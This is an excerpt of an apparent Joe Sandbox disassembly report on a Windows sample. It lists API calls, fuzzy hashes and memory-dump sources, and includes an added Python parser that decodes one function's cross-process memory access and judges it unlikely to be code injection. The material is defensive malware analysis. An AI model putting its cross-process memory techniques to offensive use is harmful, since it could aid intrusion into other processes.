• CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
• CoUninitialize.OLE32 ref: 0046E53D
Strings
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
APIs
Strings
Similarity
• API ID: _memmove
• String ID: \
• API String ID: 4104443479-2967466578
APIs
Strings
Similarity
• API ID: _memmove
• String ID: \
• API String ID: 4104443479-2967466578
APIs
Strings
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID: \
                                                                                                                                                                                                                • API String ID: 4104443479-2967466578
                                                                                                                                                                                                                • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                                                                                                                • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                                                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                                                                • API String ID: 708495834-557222456
                                                                                                                                                                                                                • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                                                                                                                • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                                                                                                                                  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                                                                                                                                  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                                                                                                                                  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                                                                                                                                  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                                                                                                • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
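The APIs list of the entry above describes a cross-process memory round trip: GetWindowThreadProcessId resolves the owner of a window, OpenProcess opens it with access mask 0x438, VirtualAllocEx commits a PAGE_READWRITE buffer in it, and WriteProcessMemory/ReadProcessMemory move data in and out around SendMessageW calls with message IDs 0x1104 and 0x1111. Those two IDs are TVM_GETITEMRECT and TVM_HITTEST (commctrl.h, TV_FIRST + 4 and TV_FIRST + 17), both of which take an lParam pointer that must be valid in the window owner's address space, which is why a foreign allocation is needed at all. The script below is an added example, not Joe Sandbox code and not code recovered from the sample: it parses API lines in the report's own format (copied verbatim as constructed input), decodes the access mask, allocation flags and message IDs using Windows SDK constant names, and applies a small chain heuristic of its own. The point it makes explicit is that this function's foreign write uses a non-executable allocation and an access mask without PROCESS_CREATE_THREAD, so a "writes to foreign memory" hit from this code path is consistent with reading a tree-view control in another process rather than with a code-injection stage; the `alloc_executable` flag is what separates the two readings.

```python
"""Parse the APIs list of a Joe Sandbox IDA-plugin function entry and decode
the cross-process memory access it describes.

Added example; not Joe Sandbox code and not code recovered from the sample.
Constant names follow the Windows SDK (winnt.h, commctrl.h); the chain
heuristic in analyse() is this example's own, not a Joe Sandbox signature.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: the eight API lines of the function entry above, copied
# verbatim from the report.
SAMPLE_APIS = """\
  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
• SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
"""

# One report line: optional "Part of subcall function <addr>:", then
# Api.MODULE(args), ref: <addr>.  Arguments are 8-digit hex or "?" when the
# plugin could not resolve them statically; the argument list may be absent.
LINE_RE = re.compile(
    r"(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw argument strings as printed in the report
    ref: str                 # address of the call site
    subcall: Optional[str]   # address of the subcall function, if nested


def parse_apis(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m["api"], m["module"], args, m["ref"], m["sub"]))
    return calls


def arg_int(a: str) -> Optional[int]:
    """'?' means the plugin could not resolve the argument statically."""
    return None if a == "?" else int(a, 16)


# OpenProcess desired-access bits (winnt.h PROCESS_*).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
# VirtualAllocEx flAllocationType and flProtect (winnt.h MEM_* / PAGE_*).
MEM_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
EXECUTABLE_PROTECT = {0x10, 0x20, 0x40}
# Tree-view messages (commctrl.h, TV_FIRST = 0x1100).  Both take a pointer in
# lParam that must be valid in the window owner's address space.
TV_FIRST = 0x1100
TVM_MESSAGES = {TV_FIRST + 4: "TVM_GETITEMRECT", TV_FIRST + 17: "TVM_HITTEST"}


def decode_mask(value: int, table: Dict[int, str]) -> List[str]:
    """Expand a bit mask into SDK names; unknown bits are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(hex(leftover))
    return names


def analyse(calls: List[ApiCall]) -> dict:
    """Decode the interesting arguments and apply the example's own heuristic:
    OpenProcess + VirtualAllocEx + WriteProcessMemory is a foreign write; it
    is only an injection candidate if the allocation is executable."""
    f: dict = {"messages": set()}
    for c in calls:
        if c.api == "OpenProcess" and c.args:
            v = arg_int(c.args[0])
            if v is not None:
                f["open_process_rights"] = decode_mask(v, PROCESS_RIGHTS)
        elif c.api == "VirtualAllocEx" and len(c.args) == 5:
            alloc, prot = arg_int(c.args[3]), arg_int(c.args[4])
            if alloc is not None:
                f["alloc_type"] = decode_mask(alloc, MEM_TYPE)
            if prot is not None:
                f["alloc_protect"] = PAGE_PROTECT.get(prot, hex(prot))
                f["alloc_executable"] = prot in EXECUTABLE_PROTECT
        elif c.api == "SendMessageW" and len(c.args) >= 2:
            msg = arg_int(c.args[1])
            if msg is not None:
                f["messages"].add(TVM_MESSAGES.get(msg, hex(msg)))
    names = {c.api for c in calls}
    f["foreign_write_chain"] = {"OpenProcess", "VirtualAllocEx",
                                "WriteProcessMemory"} <= names
    f["reads_back"] = "ReadProcessMemory" in names
    return f


if __name__ == "__main__":
    for key, value in analyse(parse_apis(SAMPLE_APIS)).items():
        print(f"{key}: {value}")
```

Run stand-alone, the script reports the access mask as PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, the allocation as MEM_COMMIT / PAGE_READWRITE with `alloc_executable` false, and the messages as TVM_GETITEMRECT and TVM_HITTEST. The same parser works on the other APIs lists in this report, including lines without an argument list such as `GetLastError.KERNEL32 ref: 004422E1`.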
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID: \$]$h
                                                                                                                                                                                                                • API String ID: 4104443479-3262404753
                                                                                                                                                                                                                • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                                                                                                                • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                                                                                                                                                • String ID: <$@
                                                                                                                                                                                                                • API String ID: 2417854910-1426351568
                                                                                                                                                                                                                • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                                                                                                                                                • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
• Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
• String ID:
• API String ID: 3705125965-3916222277
• Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
• Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
• Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
• Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
APIs
• GetMenuItemInfoW.USER32 ref: 0045FAC4
• DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
• DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Menu$Delete$InfoItem
• String ID: 0
• API String ID: 135850232-4108050209
• Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
• Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
• Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
• Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
• GetWindowLongW.USER32(?,000000F0), ref: 0045087D
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Window$Long
• String ID: SysTreeView32
• API String ID: 847901565-1698111956
• Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
• Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
• Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
• Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
APIs
• LoadLibraryA.KERNEL32(?), ref: 00434B10
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
• FreeLibrary.KERNEL32(?), ref: 00434B9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails
• API String ID: 145871493-4132174516
• Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
• Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
• Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
• Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
APIs
• SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: SysMonthCal32
• API String ID: 2326795674-1439706946
• Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
• Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
• Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
• Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
APIs
• DestroyWindow.USER32(00000000), ref: 00450A2F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DestroyWindow
                                                                                                                                                                                                                • String ID: msctls_updown32
                                                                                                                                                                                                                • API String ID: 3375834691-2298589950
                                                                                                                                                                                                                • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                                                                                                • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _memmove
                                                                                                                                                                                                                • String ID: $<
                                                                                                                                                                                                                • API String ID: 4104443479-428540627
                                                                                                                                                                                                                • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                                                                                                                • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
